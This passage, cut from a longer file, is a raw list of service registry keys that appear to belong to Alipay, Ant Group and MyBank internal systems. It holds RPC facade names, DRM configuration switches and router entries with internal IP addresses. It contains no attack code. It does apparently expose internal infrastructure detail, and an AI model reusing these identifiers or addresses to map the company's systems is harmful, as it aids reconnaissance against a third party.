municatePlugin:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.spi.BatchArSpi:1.0:hyp-mock-ok-batch-ar-spi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthserviceprod.common.service.facade.api.MedicineAssistantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.tradequery.facade.FundTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:peerpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditAuthHZSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.FundUnicomAuthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.220.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.masterdata.common.service.client.DistrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mfinsnsprod.service.facade.api.feed.ContentFeedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dsoc.service.facade.api.config.center.ServiceDeployQueryService:1.0:${dscc_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.invoicecommercial.facade.api.CorpAuthUseEinvoiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:dcepprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.point.MemberPointService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.heralib.service.facade.api.GZoneComputeStoreServiceFacade:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmhatcher.common.service.facade.api.BenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.partner.repository.BizMonCoordinateRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.bizCoverage.BcRunBatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscs.common.service.facade.blackwhite.BlackWhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.goldetfprod.common.service.facade.api.GoldRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.category.ViewCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KABAOPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.integration.promokernel.CampConsultFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.qa.QuestionAnswerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.scienguide.DimCfgManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.rate.RateConfigureFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.83.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.common.AssetAttachmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkcloudfunds.service.facade.depository.api.ConsultServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.alive.api.ALiveSignatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.TicketResultFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_F_FRSERVCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloud.aboss.common.service.facade.GenericTestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alipaypointcust.common.service.integration.finresprod.PointResourceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.switches.UserNotifySwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergwsmall22@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.alphaq.common.facade.label.api.LabelTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iexratecenter.service.facade.api.ExPubRateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloansupport.common.service.facade.risk.task.RiskTaskOptServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.installAmbushInterceptor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqInfluenceNormalizationDrm.toutiaoInfluenceThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_redeem_normal.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.envcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.protocol-https:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcbuservice_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanApplyDrmResource.repayDayCalculateSwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_SMSGW_HIGH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundprod.common.service.facade.FundUserServiceConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.bkloancollection.common.service.facade.collcase.CollCaseDeductOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.66.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.frdecision.common.service.facade.api.ClearingRulePushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.infocenter.drm.RecoveryConfig.transTypeBlackListRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbshopdecorate.common.service.facade.kbserv.decorate.DecorateBizOrderCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.common.service.facade.PeriodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.CompanyMainOperIncomeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsearch.common.service.facade.MerchantRelationSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.CloudParseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdBuMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.ApiresSceneConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:cstask_templateSmsNoticeUserProcessmngCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_FUNDSELLING_RAISEPROD_PUSH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:loginxiaowei@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.service.FeatureQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.solution.MerchantCreateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-originPriceAnnualStart@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.FinFundEvaluationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.prodcore.service.api.rate.RateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.aip.config.UserValidateConfigDrm.userIdentityCheckFLag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.busriskdec.facade.riskcheck.services.LinkInspectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:charityprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.antg.facade.archive.AntArchiveQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.ordercore.biz.order.common.OrderManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.shared.contract.ContractApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.StakeholderFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_S_CHARGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ecbill.common.service.admin.BatchTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanportal.facade.loanproduct.LoanProductQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:insxbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintransfercore.common.service.facade.transfer.FinAssignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.authconfig.AuthSceneConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.31.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.mng.MerchantKeyConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.168.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:infraform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.SyncDataMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.56.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.FundPoolDecisionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.activity.ActivityRankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.biz.shared.common.CustomLoginManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.baobei.query.BBTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.sales.MerchantConfirmQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:dcepweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:obforumcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferPriceObjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.h5.H5FlowReportSummaryDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.core.engine.front.service.stub.MDataConsumeStubService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.common.service.facade.issue.FundIssueFacade.getIssueRst:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:ropcn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:agmcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimitnear:name=com.alipay.permlimit.drm.mngConfig.ignoreSignCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebcore.common.facade.service.FixedFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.RealtimeMetricDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.ptcore.common.service.facade.api.product.ProductRelationConfigFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:ddsconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.activity.ActivityCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.statusbar.common.service.callback.StatusbarCallBackFacade:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.venue.BackstageVenueTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.GroupActionFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acappcore.common.service.facade.buildpack.BuildpackOSFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.common.AssetStockInventoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:amldata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cif:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.accountNoSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tss.supportprod.facade.bds.facade.yuque.BdsYuqueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTMEMBERMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bizprodmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fin.product.metaCenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.echox.drm.EchoxSpecialDrm.updateEchoxConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accordercore.common.service.facade.control.auth.api.PreCreateConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.tuling.common.service.api.interpersonal.CloseRelativeRelationshipQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.bdcrm.BdcrmLinkHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.client.facade.CustomerTagClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MESHYDELIVERY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.template.MessageTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.sysparam.SystemParamQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.138.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:instdatalink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.PriceAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.EventSchemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.MstTaskConfigDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.TopicConcernFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstraining.common.service.facade.training.api.CstTrainingManageService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmobile.servie.facade.api.SearchQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.BillQueryBankConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gftax_gfacProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.UserFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.InitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mytradeprod.common.service.facade.PaymentReceiptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.trustlife.tis.mutual.claim.facade.endpoint.InvestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.48.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.140.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.deleteSuccProcessedFile,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rassistcenter.common.service.facade.data.hbase.RassistGetHbaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:payacceptance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.interact.SnsInteractQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.guardianconsole.facade.configs.service.GuardianServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.pcardsales:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileacauth.service.terminal.facade.TerminalWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.admin.MiniAuditInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_INVOICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.kwlib:name=com.alipay.fc.process.bp.engine.job.drm.JobDrmAdapter.controlLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.nextCheckTimeSeed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata3.schedule.rpc.service.ops.FieldInstanceRerunService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:arkscheduler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpointprod.facade.api.MpointDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcie.common.service.facade.ZmScoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.ApplyFlowChargeoffFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.bkgwlite.common.service.facade.api.TransSendService:1.0:bkgwlite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fundprod.common.service.facade.product.manage.FpInventoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.CommoditiesTransferOrderRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:globalremitprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.SyncExecuteServiceRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.midas:name=com.alipay.zdal.ldc.tair.midasCommonTair.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_PAYBIZCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:adtask@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.query.OriginalCardInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.sp.business.BusinessMessageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.interaction.QuestionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.isvinfo.IsvInfoManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.AppPreTestConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.pipeline.common.facade.core.config.PipelineGlobalConfigOpenService:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcacceptance.common.service.facade.FulfillmentOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:ichecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.verify.ExamVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundInternalMoneyTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergwopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.208.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.cif.facade.CustomerTagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.amc.service.AmcEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insadvisor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.rpc.AuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.agaccesstoken.AgATKResourceViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dadeploymentunit.facade.metadata.api.MetadataActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.168.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifecore.common.service.facade.view.PublicDynamicViewOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.util.MrchProdCommonUtilFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fcamlcloud.common.service.facade.api.AmlAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nfcc.common.service.facade.agna.OriginQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.193.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodcore.service.transfer.api.ProductMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.criu.CheckPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.129.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeexprod.facade.EdeductTaskProdConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.177.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.facade.partner.PartnerExterfaceFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.ticket.ActivityTicketQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facad